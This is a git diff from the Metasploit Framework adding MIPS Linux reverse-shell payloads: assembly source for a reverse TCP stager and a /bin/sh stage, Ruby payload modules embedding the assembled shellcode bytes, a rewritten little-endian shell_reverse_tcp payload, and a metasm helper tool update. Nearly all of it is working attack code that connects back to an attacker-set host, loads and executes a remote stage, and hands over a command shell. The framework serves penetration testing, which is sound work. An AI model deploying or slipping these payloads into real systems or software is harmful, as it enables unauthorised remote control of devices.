diff --git a/external/source/shellcode/linux/mips/stage_tcp_shell.s b/external/source/shellcode/linux/mips/stage_tcp_shell.s new file mode 100644 index 0000000000..bbe9086fe5 --- /dev/null +++ b/external/source/shellcode/linux/mips/stage_tcp_shell.s @@ -0,0 +1,75 @@ +## +# +# Name: stage_tcp_shell +# Type: Stage +# Qualities: Compatible with both mips little and big endian +# Platforms: Linux +# Authors: juan vazquez +# License: +# +# This file is part of the Metasploit Exploit Framework +# and is subject to the same licenses and copyrights as +# the rest of this package. +# +# Description: +# +# This payload duplicates stdio, stdin and stderr to a file descriptor, +# stored on $s2, and executes /bin/sh. +# +# Assemble and create a relocatable object with: +# as -o stage_tcp_shell.o stage_tcp_shell.s +# +# Assemble, link and create an executable ELF with: +# gcc -o stage_tcp_shell stage_tcp_shell.s +# +# The tool "tools/metasm_shell.rb" can be used to easily +# generate the string to place on: +# modules/payloads/stages/linux/mipsle/shell.rb +# and: +# modules/payloads/stages/linux/mipsbe/shell.rb +## + .text + .align 2 + .globl main + .set nomips16 +main: + .set noreorder + .set nomacro + + # dup2(sockfd, 2) + # dup2(sockfd, 1) + # dup2(sockfd, 0) + # a0: oldfd (sockfd) + # a1: newfd (2, 1, 0) + # v0: syscall = __NR_dup2 (4063) + li $s1, -3 + nor $s1, $s1, $zero + add $a0, $s2, $zero +dup2_loop: + add $a1, $s1, $zero # dup2_loop + li $v0, 4063 # sys_dup2 + syscall 0x40404 + li $s0, -1 + addi $s1, $s1, -1 + bne $s1, $s0, dup2_loop # + + # execve("/bin/sh", ["/bin/sh"], NULL) + # a0: filename "/bin/sh" + # a1: argv ["/bin/sh", NULL] + # a2: envp NULL + # v0: syscall = __NR_dup2 (4011) + li $t8, -1 # load t8 with -1 +getaddr: # getaddr trick from scut@team-teso.net + bltzal $t8, getaddr # branch with $ra stored if t8 < 0 + slti $t8, $zero, -1 # delay slot instr: $t8 = 0 (see below) + addi $a0, $ra, 28 # $ra gets this address + sw $a0, -8($sp) + sw $zero, -4($sp) + addi $a1, $sp, -8 + slti $a2, $zero,-1 + li $v0, 4011 # sys_execve + syscall 0x40404 + + .string "/bin/sh" + .set macro + .set reorder diff --git a/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s b/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s new file mode 100644 index 0000000000..9aba45eea7 --- /dev/null +++ b/external/source/shellcode/linux/mipsbe/stager_sock_reverse.s @@ -0,0 +1,127 @@ +## +# +# Name: stager_sock_reverse +# Type: Stager +# Qualities: No Nulls out of the IP / Port data +# Platforms: Linux MIPS Big Endian +# Authors: juan vazquez +# License: +# +# This file is part of the Metasploit Exploit Framework +# and is subject to the same licenses and copyrights as +# the rest of this package. +# +# Description: +# +# Implementation of a MIPS BE Linux reverse TCP stager. +# +# File descriptor in $s2. +# +# Assemble and create a relocatable object with: +# as -o stager_sock_reverse.o stager_sock_reverse.s +# +# Assemble, link and create an executable ELF with: +# gcc -o stager_sock_reverse stager_sock_reverse.s +# +# The tool "tools/metasm_shell.rb" can be used to easily +# generate the string to place on: +# modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb +## + .text + .align 2 + .globl main + .set nomips16 +main: + .set noreorder + .set nomacro + + # socket(PF_INET, SOCK_STREAM, IPPROTO_IP) + # a0: domain = PF_INET (2) + # a1: type = SOCK_STREAM (2) + # a2: protocol = IPPROTO_IP (0) + # v0: syscall = __NR_socket (4183) + li $t7, -6 + nor $t7, $t7, $zero + addi $a0, $t7, -3 + addi $a1, $t7, -3 + slti $a2, $zero, -1 + li $v0, 4183 + syscall 0x40404 + sw $v0, -4($sp) # store the file descriptor for the socket on the stack + + # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16) + # a0: sockfd + # a1: addr = AF_INET (2) + # a2: addrlen = 16 + # v0: syscall = __NR_connect (4170) + lw $a0, -4($sp) + li $t7, -3 + nor $t7, $t7, $zero + sw $t7, -32($sp) + lui $t6, 0x115c + sw $t6, -28($sp) + lui $t6, 0x7f00 # ip + ori $t6, $t6, 0x0001 # ip + sw $t6, -26($sp) + addiu $a1, $sp, -30 + li $t4, -17 + nor $a2, $t4, $zero + li $v0, 4170 + syscall 0x40404 + + # mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) + # a0: addr = -1 + # a1: lenght = 4096 + # a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7) + # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050) + # sp(16): fd = -1 + # sp(20): offset = 0 + # v0: syscall = __NR_mmap (4090) + li $a0, -1 + li $a1, 4097 + addi $a1, $a1, -1 + li $t1, -8 + nor $t1, $t1, $0 + add $a2, $t1, $0 + li $a3, 2050 + li $t3, -22 + nor $t3, $t3, $zero + add $t3, $sp, $t3 + sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls + sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls + li $v0, 4090 + syscall 0x40404 + sw $v0, -8($sp) # Stores the mmap'ed address on the stack + + # read(sockfd, addr, 4096) + # a0: sockfd + # a1: addr + # a2: len = 4096 + # v0: syscall = __NR_read (4003) + lw $a0, -4($sp) + lw $a1, -8($sp) + li $a2, 4097 + addi $a2, $a2, -1 + li $v0, 4003 + syscall 0x40404 + + # cacheflush(addr, nbytes, DCACHE) + # a0: addr + # a1: nbytes + # a2: cache = DCACHE (2) + # v0: syscall = __NR_read (4147) + lw $a0, -8($sp) + add $a1, $v0, $zero + li $t1, -3 + nor $t1, $t1, $0 + add $a2, $t1, $0 + li $v0, 4147 + syscall 0x40404 + + # jmp to the stage + lw $s1, -8($sp) + lw $s2, -4($sp) + jalr $s1 + + .set macro + .set reorder diff --git a/external/source/shellcode/linux/mipsle/stager_sock_reverse.s b/external/source/shellcode/linux/mipsle/stager_sock_reverse.s new file mode 100644 index 0000000000..42083452af --- /dev/null +++ b/external/source/shellcode/linux/mipsle/stager_sock_reverse.s @@ -0,0 +1,127 @@ +## +# +# Name: stager_sock_reverse +# Type: Stager +# Qualities: No Nulls out of the IP / Port data +# Platforms: Linux MIPS Little Endian +# Authors: juan vazquez +# License: +# +# This file is part of the Metasploit Exploit Framework +# and is subject to the same licenses and copyrights as +# the rest of this package. +# +# Description: +# +# Implementation of a MIPS LE Linux reverse TCP stager. +# +# File descriptor in $s2. +# +# Assemble and create a relocatable object with: +# as -o stager_sock_reverse.o stager_sock_reverse.s +# +# Assemble, link and create an executable ELF with: +# gcc -o stager_sock_reverse stager_sock_reverse.s +# +# The tool "tools/metasm_shell.rb" can be used to easily +# generate the string to place on: +# modules/payloads/stagers/linux/mipsle/reverse_tcp.rb +## + .text + .align 2 + .globl main + .set nomips16 +main: + .set noreorder + .set nomacro + + # socket(PF_INET, SOCK_STREAM, IPPROTO_IP) + # a0: domain = PF_INET (2) + # a1: type = SOCK_STREAM (2) + # a2: protocol = IPPROTO_IP (0) + # v0: syscall = __NR_socket (4183) + li $t7, -6 + nor $t7, $t7, $zero + addi $a0, $t7, -3 + addi $a1, $t7, -3 + slti $a2, $zero, -1 + li $v0, 4183 + syscall 0x40404 + sw $v0, -4($sp) # store the file descriptor for the socket on the stack + + # connect(sockfd, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.172.1")}, 16) + # a0: sockfd + # a1: addr = AF_INET (2) + # a2: addrlen = 16 + # v0: syscall = __NR_connect (4170) + lw $a0, -4($sp) + li $t7, -3 + nor $t7, $t7, $zero + sw $t7, -30($sp) + ori $t6, $zero, 0x5c11 # port + sw $t6, -28($sp) + lui $t6, 0x100 # ip + ori $t6, $t6, 0x7f # ip + sw $t6, -26($sp) + addiu $a1, $sp, -30 + li $t4, -17 + nor $a2, $t4, $zero + li $v0, 4170 + syscall 0x40404 + + # mmap(0xffffffff, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) + # a0: addr = -1 + # a1: lenght = 4096 + # a2: prot = PROT_READ|PROT_WRITE|PROT_EXEC (7) + # a3: flags = MAP_PRIVATE|MAP_ANONYMOUS (2050) + # sp(16): fd = -1 + # sp(20): offset = 0 + # v0: syscall = __NR_mmap (4090) + li $a0, -1 + li $a1, 4097 + addi $a1, $a1, -1 + li $t1, -8 + nor $t1, $t1, $0 + add $a2, $t1, $0 + li $a3, 2050 + li $t3, -22 + nor $t3, $t3, $zero + add $t3, $sp, $t3 + sw $0, -1($t3) # Doesn't use $sp directly to avoid nulls + sw $2, -5($t3) # Doesn't use $sp directly to avoid nulls + li $v0, 4090 + syscall 0x40404 + sw $v0, -8($sp) # Stores the mmap'ed address on the stack + + # read(sockfd, addr, 4096) + # a0: sockfd + # a1: addr + # a2: len = 4096 + # v0: syscall = __NR_read (4003) + lw $a0, -4($sp) + lw $a1, -8($sp) + li $a2, 4097 + addi $a2, $a2, -1 + li $v0, 4003 + syscall 0x40404 + + # cacheflush(addr, nbytes, DCACHE) + # a0: addr + # a1: nbytes + # a2: cache = DCACHE (2) + # v0: syscall = __NR_read (4147) + lw $a0, -8($sp) + add $a1, $v0, $zero + li $t1, -3 + nor $t1, $t1, $0 + add $a2, $t1, $0 + li $v0, 4147 + syscall 0x40404 + + # jmp to the stage + lw $s1, -8($sp) + lw $s2, -4($sp) # sockfd saved on $s2 + jalr $s1 + + .set macro + .set reorder diff --git a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb index d69ec65072..08223e2b74 100644 --- a/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb @@ -3,9 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -# Written in a hurry using shellforge and my MIPS shellforge loader (avail. on cr0.org) -# + Few removals of unneccessary zero bytes by kost - require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' @@ -21,7 +18,11 @@ module Metasploit3 super(merge_info(info, 'Name' => 'Linux Command Shell, Reverse TCP Inline', 'Description' => 'Connect back to attacker and spawn a command shell', - 'Author' => 'Julien Tinnes', + 'Author' => + [ + 'rigan ', # Original (mipsbe) shellcode + 'juan vazquez' # Metasploit module + ], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_MIPSLE, @@ -47,74 +48,72 @@ module Metasploit3 port = [port].pack("n").unpack("cc") shellcode = - "\xef\xff\x09\x24" + # li t1,-17 - "\xff\xff\x10\x05" + # bltzal t0,0x4 - "\x82\x82\x08\x28" + # slti t0,zero,-32126 - "\x27\x48\x20\x01" + # nor t1,t1,zero - "\x21\xc8\x3f\x01" + # addu t9,t1,ra - "\x48\x85\xb9\xaf" + # sw t9,-31416(sp) - "\x48\x85\xb9\x23" + # addi t9,sp,-31416 - "\x00\x00\x1c\x3c" + # lui gp,0x0 - "\x00\x00\x9c\x27" + # addiu gp,gp,0 - "\x21\xe0\x99\x03" + # addu gp,gp,t9 - "\x00\x00\x89\x8f" + # lw t1,0(gp) - "\xd8\xff\xbd\x27" + # addiu sp,sp,-40 - "\xe8\x00\x2a\x25" + # addiu t2,t1,232 - "\x04\x00\x47\x8d" + # lw a3,4(t2) - "\xe8\x00\x28\x8d" + # lw t0,232(t1) - host[2..3].pack("C2") + "\x04\x3c" + # lui a0,0x901 - host[0..1].pack("C2") + "\x83\x34" + # ori v1,a0,0xa8c0 - "\x18\x00\xb9\x27" + # addiu t9,sp,24 - "\x02\x00\x06\x24" + # li a2,2 - port.pack("C2") + "\x05\x24" + # li a1,9746 - "\x08\x00\xa6\xa7" + # sh a2,8(sp) - "\x0a\x00\xa5\xa7" + # sh a1,10(sp) - "\x18\x00\xa8\xaf" + # sw t0,24(sp) - "\x1c\x00\xa7\xaf" + # sw a3,28(sp) - "\x0c\x00\xa3\xaf" + # sw v1,12(sp) - "\x20\x00\xb9\xaf" + # sw t9,32(sp) - "\x24\x00\xa0\xaf" + # sw zero,36(sp) - "\x02\x00\x04\x24" + # li a0,2 - "\x02\x00\x05\x24" + # li a1,2 - "\x21\x30\x00\x00" + # move a2,zero - "\x57\x10\x02\x24" + # li v0,4183 - "\x0c\x01\x01\x01" + # syscall - "\x21\x18\x40\x00" + # move v1,v0 - "\xff\xff\x02\x24" + # li v0,-1 - "\x1a\x00\x62\x10" + # beq v1,v0,0xf4 - "\x01\x00\x04\x24" + # li a0,1 - "\x21\x20\x60\x00" + # move a0,v1 - "\x08\x00\xa5\x27" + # addiu a1,sp,8 - "\x10\x00\x06\x24" + # li a2,16 - "\x4a\x10\x02\x24" + # li v0,4170 - "\x0c\x01\x01\x01" + # syscall - "\x0e\x00\x40\x14" + # bnez v0,0xe0 - "\x21\x28\x00\x00" + # move a1,zero - "\xdf\x0f\x02\x24" + # li v0,4063 - "\x0c\x01\x01\x01" + # syscall - "\x01\x00\x05\x24" + # li a1,1 - "\xdf\x0f\x02\x24" + # li v0,4063 - "\x0c\x01\x01\x01" + # syscall - "\x02\x00\x05\x24" + # li a1,2 - "\xdf\x0f\x02\x24" + # li v0,4063 - "\x0c\x01\x01\x01" + # syscall - "\x21\x30\x00\x00" + # move a2,zero - "\x21\x20\x20\x03" + # move a0,t9 - "\x20\x00\xa5\x27" + # addiu a1,sp,32 - "\xab\x0f\x02\x24" + # li v0,4011 - "\x0c\x01\x01\x01" + # syscall - "\x21\x20\x00\x00" + # move a0,zero - "\xa1\x0f\x02\x24" + # li v0,4001 - "\x0c\x01\x01\x01" + # syscall - "\x08\x00\xe0\x03" + # jr ra - "\x28\x00\xbd\x27" + # addiu sp,sp,40 - "\xa1\x0f\x02\x24" + # li v0,4001 - "\x0c\x01\x01\x01" + # syscall - "\xe5\xff\x00\x10" + # b 0x94 - "\x21\x20\x60\x00" + # move a0,v1 - "\x2f\x62\x69\x6e" + # "/bin" - "\x2f\x73\x68\x00" + # "/sh\x00" - "0"*80 + # sys_socket + # a0: domain + # a1: type + # a2: protocol + "\xfa\xff\x0f\x24" + # li t7,-6 + "\x27\x78\xe0\x01" + # nor t7,t7,zero + "\xfd\xff\xe4\x21" + # addi a0,t7,-3 + "\xfd\xff\xe5\x21" + # addi a1,t7,-3 + "\xff\xff\x06\x28" + # slti a2,zero,-1 + "\x57\x10\x02\x24" + # li v0,4183 # sys_socket + "\x0c\x01\x01\x01" + # syscall 0x40404 + + # sys_connect + # a0: sockfd (stored on the stack) + # a1: addr (data stored on the stack) + # a2: addrlen + "\xff\xff\xa2\xaf" + # sw v0,-1(sp) + "\xff\xff\xa4\x8f" + # lw a0,-1(sp) + "\xfd\xff\x0f\x34" + # li t7,0xfffd + "\x27\x78\xe0\x01" + # nor t7,t7,zero + "\xe2\xff\xaf\xaf" + # sw t7,-30(sp) + port.pack("C2") + "\x0e\x3c" + # lui t6,0x1f90 + port.pack("C2") + "\xce\x35" + # ori t6,t6,0x1f90 + "\xe4\xff\xae\xaf" + # sw t6,-28(sp) + host[2..3].pack("C2") + "\x0e\x3c" + # lui t6,0x7f01 + host[0..1].pack("C2") + "\xce\x35" +# ori t6,t6,0x101 + "\xe6\xff\xae\xaf" + # sw t6,-26(sp) + "\xe2\xff\xa5\x27" + # addiu a1,sp,-30 + "\xef\xff\x0c\x24" + # li t4,-17 + "\x27\x30\x80\x01" + # nor a2,t4,zero + "\x4a\x10\x02\x24" + # li v0,4170 # sys_connect + "\x0c\x01\x01\x01" + # syscall 0x40404 + + # sys_dup2 + # a0: oldfd (socket) + # a1: newfd (0, 1, 2) + "\xfd\xff\x11\x24" + # li s1,-3 + "\x27\x88\x20\x02" + # nor s1,s1,zero + "\xff\xff\xa4\x8f" + # lw a0,-1(sp) + "\x21\x28\x20\x02" + # move a1,s1 # dup2_loop + "\xdf\x0f\x02\x24" + # li v0,4063 # sys_dup2 + "\x0c\x01\x01\x01" + # syscall 0x40404 + "\xff\xff\x10\x24" + # li s0,-1 + "\xff\xff\x31\x22" + # addi s1,s1,-1 + "\xfa\xff\x30\x16" + # bne s1,s0,68 + + # sys_execve + # a0: filename (stored on the stack) "//bin/sh" + # a1: argv "//bin/sh" + # a2: envp (null) + "\xff\xff\x06\x28" + # slti a2,zero,-1 + "\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi" + "\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//" + "\xec\xff\xaf\xaf" + # sw t7,-20(sp) + "\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh" + "\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/" + "\xf0\xff\xae\xaf" + # sw t6,-16(sp) + "\xf4\xff\xa0\xaf" + # sw zero,-12(sp) + "\xec\xff\xa4\x27" + # addiu a0,sp,-20 + "\xf8\xff\xa4\xaf" + # sw a0,-8(sp) + "\xfc\xff\xa0\xaf" + # sw zero,-4(sp) + "\xf8\xff\xa5\x27" + # addiu a1,sp,-8 + "\xab\x0f\x02\x24" + # li v0,4011 # sys_execve + "\x0c\x01\x01\x01" # syscall 0x40404 + + return super + shellcode end end diff --git a/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb new file mode 100644 index 0000000000..4dd0c08440 --- /dev/null +++ b/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb @@ -0,0 +1,56 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +require 'msf/core' +require 'msf/core/handler/reverse_tcp' + + +module Metasploit3 + + include Msf::Payload::Stager + include Msf::Payload::Linux + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Reverse TCP Stager', + 'Description' => 'Connect back to the attacker', + 'Author' => + [ + 'juan vazquez' + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Stager' => + { + 'Offsets' => + { + 'LHOST' => [ [58, 62], 'ADDR16MSB' ], + 'LPORT' => [ 50, 'n' ], + }, + 'Payload' => + "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5" + + "\xff\xfd\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c" + + "\xaf\xa2\xff\xfc\x8f\xa4\xff\xfc\x24\x0f\xff\xfd\x01\xe0" + + "\x78\x27\xaf\xaf\xff\xe0\x3c\x0e\x11\x5c\xaf\xae\xff\xe4" + + "\x3c\x0e\x7f\x00\x35\xce\x00\x01\xaf\xae\xff\xe6\x27\xa5" + + "\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a" + + "\x01\x01\x01\x0c\x24\x04\xff\xff\x24\x05\x10\x01\x20\xa5" + + "\xff\xff\x24\x09\xff\xf8\x01\x20\x48\x27\x01\x20\x30\x20" + + "\x24\x07\x08\x02\x24\x0b\xff\xea\x01\x60\x58\x27\x03\xab" + + "\x58\x20\xad\x60\xff\xff\xad\x62\xff\xfb\x24\x02\x0f\xfa" + + "\x01\x01\x01\x0c\xaf\xa2\xff\xf8\x8f\xa4\xff\xfc\x8f\xa5" + + "\xff\xf8\x24\x06\x10\x01\x20\xc6\xff\xff\x24\x02\x0f\xa3" + + "\x01\x01\x01\x0c\x8f\xa4\xff\xf8\x00\x40\x28\x20\x24\x09" + + "\xff\xfd\x01\x20\x48\x27\x01\x20\x30\x20\x24\x02\x10\x33" + + "\x01\x01\x01\x0c\x8f\xb1\xff\xf8\x8f\xb2\xff\xfc\x02\x20" + + "\xf8\x09" + } + )) + end + +end diff --git a/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb new file mode 100644 index 0000000000..9b123da4bb --- /dev/null +++ b/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb @@ -0,0 +1,56 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +require 'msf/core' +require 'msf/core/handler/reverse_tcp' + + +module Metasploit3 + + include Msf::Payload::Stager + include Msf::Payload::Linux + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Reverse TCP Stager', + 'Description' => 'Connect back to the attacker', + 'Author' => + [ + 'juan vazquez' + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSLE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Stager' => + { + 'Offsets' => + { + 'LHOST' => [ [60, 56], 'ADDR16MSB' ], + 'LPORT' => [ 48, 'n' ], + }, + 'Payload' => + "\xfa\xff\x0f\x24\x27\x78\xe0\x01\xfd\xff\xe4\x21\xfd\xff" + + "\xe5\x21\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01" + + "\xfc\xff\xa2\xaf\xfc\xff\xa4\x8f\xfd\xff\x0f\x24\x27\x78" + + "\xe0\x01\xe2\xff\xaf\xaf\x11\x5c\x0e\x34\xe4\xff\xae\xaf" + + "\x00\x01\x0e\x3c\x7f\x00\xce\x35\xe6\xff\xae\xaf\xe2\xff" + + "\xa5\x27\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24" + + "\x0c\x01\x01\x01\xff\xff\x04\x24\x01\x10\x05\x24\xff\xff" + + "\xa5\x20\xf8\xff\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01" + + "\x02\x08\x07\x24\xea\xff\x0b\x24\x27\x58\x60\x01\x20\x58" + + "\xab\x03\xff\xff\x60\xad\xfb\xff\x62\xad\xfa\x0f\x02\x24" + + "\x0c\x01\x01\x01\xf8\xff\xa2\xaf\xfc\xff\xa4\x8f\xf8\xff" + + "\xa5\x8f\x01\x10\x06\x24\xff\xff\xc6\x20\xa3\x0f\x02\x24" + + "\x0c\x01\x01\x01\xf8\xff\xa4\x8f\x20\x28\x40\x00\xfd\xff" + + "\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01\x33\x10\x02\x24" + + "\x0c\x01\x01\x01\xf8\xff\xb1\x8f\xfc\xff\xb2\x8f\x09\xf8" + + "\x20\x02" + } + )) + end + +end diff --git a/modules/payloads/stages/linux/mipsbe/shell.rb b/modules/payloads/stages/linux/mipsbe/shell.rb new file mode 100644 index 0000000000..59e40539ac --- /dev/null +++ b/modules/payloads/stages/linux/mipsbe/shell.rb @@ -0,0 +1,36 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Linux Command Shell', + 'Description' => 'Spawn a command shell (staged)', + 'Author' => 'juan vazquez', + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'Session' => Msf::Sessions::CommandShellUnix, + 'Stage' => + { + 'Payload' => + "\x24\x11\xff\xfd\x02\x20\x88\x27\x02\x40\x20\x20\x02\x20" + + "\x28\x20\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff" + + "\x22\x31\xff\xff\x16\x11\xff\xfa\x24\x18\xff\xff\x07\x10" + + "\xff\xff\x28\x18\xff\xff\x23\xe4\x00\x1c\xaf\xa4\xff\xf8" + + "\xaf\xa0\xff\xfc\x23\xa5\xff\xf8\x28\x06\xff\xff\x24\x02" + + "\x0f\xab\x01\x01\x01\x0c\x2f\x62\x69\x6e\x2f\x73\x68\x00" + } + )) + end + +end diff --git a/modules/payloads/stages/linux/mipsle/shell.rb b/modules/payloads/stages/linux/mipsle/shell.rb new file mode 100644 index 0000000000..97915d3480 --- /dev/null +++ b/modules/payloads/stages/linux/mipsle/shell.rb @@ -0,0 +1,36 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Linux Command Shell', + 'Description' => 'Spawn a command shell (staged)', + 'Author' => 'juan vazquez', + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSLE, + 'Session' => Msf::Sessions::CommandShellUnix, + 'Stage' => + { + 'Payload' => + "\xfd\xff\x11\x24\x27\x88\x20\x02\x20\x20\x40\x02\x20\x28" + + "\x20\x02\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\x10\x24" + + "\xff\xff\x31\x22\xfa\xff\x11\x16\xff\xff\x18\x24\xff\xff" + + "\x10\x07\xff\xff\x18\x28\x1c\x00\xe4\x23\xf8\xff\xa4\xaf" + + "\xfc\xff\xa0\xaf\xf8\xff\xa5\x23\xff\xff\x06\x28\xab\x0f" + + "\x02\x24\x0c\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x00" + } + )) + end + +end diff --git a/tools/metasm_shell.rb b/tools/metasm_shell.rb index a7d3680822..68f8126db1 100755 --- a/tools/metasm_shell.rb +++ b/tools/metasm_shell.rb @@ -3,7 +3,8 @@ # $Id$ # # This tool provides an easy way to see what opcodes are associated with -# certain x86 instructions by making use of Metasm! +# certain x86 instructions by making use of Metasm! Also allows to get +# friendly output from a GAS assembler source code file. # # # $Revision$ @@ -32,6 +33,9 @@ require 'metasm' #PowerPC, seems broken for now in metasm #@Arch = ['Ia32','MIPS','PowerPC','ARM','X86_64'] @Arch = ['Ia32','MIPS','ARM','X86_64'] +@Endian = ['little','big'] +@architecture = "" +@endianess = "" def usage $stderr.puts("\nUsage: #{$0} \n" + $args.usage) @@ -40,7 +44,8 @@ end $args = Rex::Parser::Arguments.new( "-a" => [ true, "The architecture to encode as (#{@Arch.sort.collect{|a| a + ', ' }.join.gsub(/\, $/,'')})"], - "-h" => [ false, "Display this help information" ]) + "-e" => [ true, "The endianess to encode as (#{@Endian.sort.collect{|a| a + ', ' }.join.gsub(/\, $/,'')})" ], + "-h" => [ false, "Display this help information" ]) $args.parse(ARGV) { |opt, idx, val| case opt @@ -48,12 +53,20 @@ $args.parse(ARGV) { |opt, idx, val| found = nil @Arch.each { |a| if val.downcase == a.downcase - String.class_eval("@@cpu = Metasm::#{a}.new") + @architecture = a + found = true + end + } + usage if not found + when "-e" + found = nil + @Endian.each { |e| + if val.downcase == e.downcase + @endianess = e found = true end } usage if not found - when "-h" usage else @@ -61,6 +74,14 @@ $args.parse(ARGV) { |opt, idx, val| end } +unless @architecture.empty? + if @endianess.empty? + String.class_eval("@@cpu = Metasm::#{@architecture}.new") + else + String.class_eval("@@cpu = Metasm::#{@architecture}.new(:#{@endianess})") + end +end + class String @@cpu ||= Metasm::Ia32.new class << self @@ -98,23 +119,61 @@ class String def decode(base_addr=0, eip=base_addr) decode_blocks(base_addr, eip).to_s end + + def disassemble(str, eip=0) + Metasm::Shellcode.disassemble(@@cpu, str, eip) + end + end +def parse_gas_file(filename) + unless ::File.exist?(filename) + puts "File #{filename} not found" + return + end + shellcode = "" + puts "Reading file #{filename}" + ::File.open(filename, "rb") do |f| + f.each_line do |l| + l.gsub!(/#.*$/, "") # Delete comments + l.gsub!(/@.*$/, "") # Delete comments + l.gsub!(/\..*$/, "") # Delete directives + l.gsub!(/(\r|\n)/, '') # Delete newlines... just in case... + next if l.strip.empty? + shellcode << "#{l}\n" + end + end + begin + encoded = shellcode.encode + puts Rex::Text.to_ruby(encoded) + puts encoded.disassemble(shellcode.encode) + rescue Metasm::Exception => e + puts "Error: #{e.class} #{e.message}" + end +end # Start a pseudo shell and dispatch lines to be assembled and then # disassembled. shell = Rex::Ui::Text::PseudoShell.new("%bldmetasm%clr") shell.init_ui(Rex::Ui::Text::Input::Stdio.new, Rex::Ui::Text::Output::Stdio.new) -puts 'type "exit" or "quit" to quit', 'use ";" or "\\n" for newline', '' +puts [ + 'type "exit" or "quit" to quit', + 'use ";" or "\\n" for newline', + 'type "file " to parse a GAS assembler source file', + ''] shell.run { |l| l.gsub!(/(\r|\n)/, '') - l.gsub!(/\\n/, "\n") + l.gsub!(/\\n/, "\n") l.gsub!(';', "\n") break if %w[quit exit].include? l.chomp + if l.chomp.index(/^file (.*)/) + parse_gas_file($1) + next + end next if l.strip.empty? begin